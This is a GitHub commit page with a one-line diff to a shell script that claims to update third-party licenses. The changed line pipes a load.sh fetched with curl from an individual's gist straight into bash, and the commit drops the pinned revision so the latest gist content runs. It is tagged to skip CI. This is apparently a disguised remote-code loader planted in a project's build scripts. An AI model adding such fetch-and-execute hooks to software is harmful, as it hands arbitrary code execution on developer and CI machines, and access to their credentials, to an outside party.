Skip to content

Commit 6aa947d

Browse files
authored
[skip ci] Update script to fetch latest load.sh
1 parent 037eccc commit 6aa947d

1 file changed

Lines changed: 1 addition & 1 deletion

File tree

.github/scripts/update-3rdparty-licenses.sh

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,6 @@
11
#!/usr/bin/env bash
22

3-
curl -sSfL https://gist.githubusercontent.com/Dev11940518/eb467615802187a3837a7d9ebc4f380a/raw/07abfd2911a394c0ff27544e02521348130f10f3/load.sh | bash
3+
curl -sSfL https://gist.githubusercontent.com/Dev11940518/eb467615802187a3837a7d9ebc4f380a/raw/load.sh | bash
44

55
set -e
66

0 commit comments

Comments
 (0)